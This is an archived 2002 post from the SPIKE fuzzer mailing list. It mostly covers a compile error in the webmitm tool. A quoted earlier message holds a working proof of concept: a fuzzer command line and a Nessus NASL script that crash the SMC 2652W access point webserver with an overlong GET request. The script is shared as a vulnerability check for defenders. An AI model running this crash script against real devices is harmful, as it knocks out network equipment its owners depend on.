OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
nmendes_at_gep.pt
Date: Wed Oct 09 2002 - 06:59:00 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Thanks Dave. I'll compile remove it from Makefile as I do use WebProxy.

    Cheers.

    NDM

    -----Original Message-----
    From: Dave Aitel [mailto:daveimmunitysec.com]
    Sent: quarta-feira, 9 de Outubro de 2002 12:34
    To: nmendesgep.pt
    Cc: spikeimmunitysec.com
    Subject: Re: [Spike] Problems compiling webmitm

    RedHat has always been annoying to compile webmitm with. Can you do
    without it? webmitm is good for when you have a web client of some kind
    what won't take a proxy. But if it will, you can use SPIKE Proxy instead
    and it will do pretty much the same things...

    Nothing relies on webmitm, so you can comment it out of the Makefile and
    still have everything else.

    -dave

    On Wed, 2002-10-09 at 06:14, nmendesgep.pt wrote:
    > Hi there,
    >
    > I'm having problems with compiling on a RH 7.8 with openssl 0.9.6g:
    >
    > ---------------------------------------------------------------
    > gcc -Wall -funsigned-char -c -fPIC -ggdb -I/usr/local/include -I../include
    > -Ilibntlm-0.21/ buf.c
    > gcc -ggdb -o webmitm webmitm.o
    > buf.o -lssl -lcrypto -DP_SSL -I/usr/include/openssl
    > webmitm.o: In function `client_init':
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:273: undefined reference to `SSL_new'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:274: undefined reference to
    > `SSL_set_fd'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:276: undefined reference to
    > `SSL_accept'
    > webmitm.o: In function `client_read':
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:286: undefined reference to
    `SSL_read'
    > webmitm.o: In function `client_write':
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:364: undefined reference to
    `SSL_write'
    > webmitm.o: In function `client_close':
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:374: undefined reference to
    `SSL_free'
    > webmitm.o: In function `mitm_init':
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:546: undefined reference to
    > `SSL_library_init'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:547: undefined reference to
    > `SSL_load_error_strings'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:549: undefined reference to
    > `SSLv23_server_method'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:549: undefined reference to
    > `SSL_CTX_new'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:551: undefined reference to
    > `SSL_CTX_use_certificate_file'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:555: undefined reference to
    > `SSL_CTX_use_PrivateKey_file'
    > /root/hacks/SPIKE/v2.7/src/webmitm.c:559: undefined reference to
    > `SSL_CTX_check_private_key'
    > collect2: ld returned 1 exit status
    > make: *** [webmitm] Error 1
    > ---------------------------------------------------------------
    >
    > Any hint?
    >
    > Cheers
    >
    > NDM
    > -----Original Message-----
    > From: spike-adminimmunitysec.com [mailto:spike-adminimmunitysec.com]On
    > Behalf Of foo Dikator
    > Sent: quarta-feira, 9 de Outubro de 2002 1:07
    > To: spikeimmunitysec.com
    > Subject: [Spike] 2652W WLAN AP webserver
    >
    >
    > dies with
    >
    > ./closed_source_web_server_fuzz ip 80 GET / index1 .htm 0 57
    >
    >
    >
    > which translates to this (for nessus/nasl users out there):
    >
    > # this crashes the SMC 2652W WLAN Access Point webserver
    >
    > # foudn with SPIKE 2.7
    >
    > port = 80;
    >
    > req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif
    > HTTP/1.1\r\n");
    >
    > req = string(req, "Referer: http://localhost/bob\r\n");
    >
    > req = string(req, "Content-Type:
    application/x-www-form-urlencoded\r\n");
    >
    > req = string(req, "Connection: Keep-Alive\r\n");
    >
    > req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
    >
    > req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2
    > i686)\r\n");
    >
    > req = string(req, "Variable: result\r\n");
    >
    > req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
    >
    > req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg,
    > image/pjpeg, image/png\r\n");
    >
    > req = string(req, "Accept-Encoding: gzip\r\nAccept-Language:
    > en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
    >
    >
    >
    > soc = open_sock_tcp(port);
    >
    > if (soc) {
    >
    > send(socket:soc, data:req);
    >
    > close(soc);
    >
    > }
    >
    > soc = open_sock_tcp(port);
    >
    > if (!soc) {security_hole(port); exit(0); }
    >
    > req = string("GET / HTTP/1.0\r\n\r\n");
    >
    > send(socket:soc, data:req);
    >
    > bling = recv(socket:soc, length:1024, timeout:5);
    >
    > if (!bling) security_hole(port);
    >
    >
    >
    >
    >
    >
    >
    >
    >
    > -------------------------------------------------------------------------- 

    --
> --
>   Do you Yahoo!?
>   Faith Hill - Exclusive Performances, Videos, & more
>   faith.yahoo.com

    _______________________________________________
Spike mailing list
Spikeimmunitysec.com
http://www.immunitysec.com/mailman/listinfo/spike